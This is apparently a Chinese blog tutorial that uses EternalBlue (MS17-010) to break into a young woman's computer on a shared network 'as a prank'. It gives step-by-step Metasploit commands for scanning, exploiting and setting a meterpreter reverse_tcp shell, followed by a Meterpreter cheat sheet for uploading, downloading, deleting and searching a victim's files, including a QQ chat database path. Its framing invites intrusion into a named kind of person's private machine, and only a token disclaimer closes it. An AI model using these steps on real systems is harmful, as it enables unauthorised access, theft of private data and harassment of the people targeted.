利用永恒之蓝入侵小姐姐计算机并恶搞

0x001 漏洞简介

永恒之蓝(ms17-010)过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

0x002 漏洞原理

漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。然后会进行如下操作:

  1. srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
  2. 因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
  3. 因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

0x004 漏洞复现

复现环境

  • 靶机:Win7 64位 (IP: 192.168.1.14)
  • 攻击机:Kali 64位 (IP:192.168.1.11
  • 攻击机和靶机在同一个局域网下即可
  • 哈哈 只要小姐姐跟你在一个局域网下就可以利用这个方法入侵
靶机Win7下载地址:请通过小程序搜索离殇博文 并查看本文章附件进行下载 目前支持微信小程序搜索 QQ正在审核

复现过程

1. 靶机端口探测

使用Nmap对靶机端口服务进行扫描:namp -sS -sV -Pn 192.168.1.14

探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

2. 打开MSF渗透工具

终端输入命令即可打开:msfconsole

搜索ms17_010漏洞:search ms17_010

3. 使用漏洞模块

进入漏洞模块: use exploit/windows/smb/ms17_010_eternalblue

查看漏洞模块信息:info

设置攻击目标:set RHOST 192.168.1.14

查看可用的攻击payload:show payloads

选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp

设置接收信息的本地设备:set LHOST 192.168.1.11

最后检查下当前的配置:show options

开始攻击:exploit

直接拿到Win7的Shell,然后任意命令执行

出现meterpreter> 就表示已经成功入侵目标计算机了 输入shell就表示进入目标机的cmd窗口了emmm下面附上一张命令表

0x04 Meterpreter的常用命令

1.基本命令

help# 查看Meterpreter帮助

background#返回,把meterpreter后台挂起

bgkill# 杀死一个背景 meterpreter 脚本

bglist#提供所有正在运行的后台脚本的列表

bgrun#作为一个后台线程运行脚本

channel#显示活动频道

sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用

sesssions -k  number #与会话进行交互

close# 关闭通道

exit# 终止 meterpreter 会话

quit# 终止 meterpreter 会话

interact id #切换进一个信道

run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等

irb# 进入 Ruby 脚本模式

read# 从通道读取数据

write# 将数据写入到一个通道

run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本

use# 加载 meterpreter 的扩展

load/use#加载模块

Resource#执行一个已有的rc脚本

2.文件系统命令

cat c:\boot.ini#查看文件内容,文件必须存在

del c:\boot.ini #删除指定的文件

upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload  setup.exe C:\\windows\\system32\

download nimeia.txt /root/Desktop/   # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\”ProgramFiles”\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/

edit c:\boot.ini  # 编辑文件

getlwd#打印本地目录

getwd#打印工作目录

lcd#更改本地目录

ls#列出在当前目录中的文件列表

lpwd#打印本地目录

pwd#输出工作目录

cd c:\\ #进入目录文件下

rm file #删除文件

mkdir dier #在受害者系统上的创建目录

rmdir#受害者系统上删除目录

dir#列出目标主机的文件和文件夹信息

mv#修改目标主机上的文件名

search -d d:\\www -f web.config #search 文件,如search  -d c:\\  -f*.doc

meterpreter > search -f autoexec.bat  #搜索文件

meterpreter > search -f sea*.bat c:\\xamp\\

enumdesktops     #用户登录数

好了今天的教程到此结束
欢迎关注  离殇博文  小程序
在这里有源码有教程还有更多惊喜等着你
欢迎大家在下面评论出更多的msf命令 同时希望小姐姐在看了文章以后注意保护个人隐私
另外 本教程只是学习参考 还有就是提醒各位保护信息安全 请勿用于非法用途 一切后果 与本博文无关